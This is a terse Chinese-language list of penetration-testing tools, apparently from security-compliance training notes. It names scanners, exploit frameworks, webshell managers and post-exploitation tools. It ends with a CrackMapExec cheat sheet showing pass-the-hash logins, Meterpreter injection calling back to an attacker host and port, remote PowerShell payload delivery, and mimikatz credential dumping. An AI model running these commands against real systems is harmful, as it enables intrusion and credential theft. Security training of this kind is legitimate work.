等保培训
- 关键信息基础设施
PenTest-Tools
1、domainname 域名搜集工具
2、webscan web扫描工具
-
3xp10it -
- Python3编写的CMS漏洞检测框架
-
- Automated Mass Exploiter(远程/外网)
-
- 自动漏洞扫描器,自动子域名爆破,自动爬取注入,调用sqlmapapi检测注入,端口扫描,目录爆破,子网段服务探测及其端口扫描,常用框架漏洞检测。
-
- A fast vulnerability scanner
-
- Web Content Discovery Tool
-
- Quick and Dirty full-connect scanner.
./fastscan 192.169.1.1
-
FingerPrint -
-
实现针对中间件的自动化检测,端口探测->中间件识别->漏洞检测->获取webshell
-
python F-MiddlewareScan.py -h 10.111.1 python F-MiddlewareScan.py -h 192.168.1.1-192.168.2.111 python F-MiddlewareScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
-
-
gettitle.exe 192.168.1/192.168 80,8080,8181,8000 100
-
- GitHub敏感信息扫描工具
-
- htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes.
-
-
httpscan是一个扫描指定CIDR网段的Web主机的小工具。和端口扫描器不一样,httpscan是以爬虫的方式进行Web主机发现,因此相对来说不容易被防火墙拦截。
-
./httpscan.py 10.20.30.0/24 –t 10
-
-
lalascan -
pentestEr_Fully-automatic-scanner
- 定向全自动化渗透测试
-
- 全能型的网站漏洞扫描器
-
RED_HAWK -
S7scan -
Scan-T -
Spaghetti -
XAttacker -
truffleHog -
WAFNinja -
weakfilescan -
webvulscan -
- CDN探测
-
Sn1per -
- Wordpress Security Scanner
3、web fuzz工具
4、webshell工具
- antSword
- Cknife
- 冰蝎
- godzilla
5、后渗透利用工具
Night
~今日份漏洞学习~
-
- Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofer/man-in-the-middle tool
-
-
CrackMapExec(又称CME)是一个后渗透工具,有助于自动评估AD的安全性。
-
基础语法
-
# use the latest release, CME is now a binary packaged will all its dependencies root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip # execute cme (smb, winrm, mssql, ...) root@payload$ cme smb -L root@payload$ cme smb -M name_module -o VAR=DATA root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz root@payload$ cme mimikatz --server http --server-port 80
-
.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
-
powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
-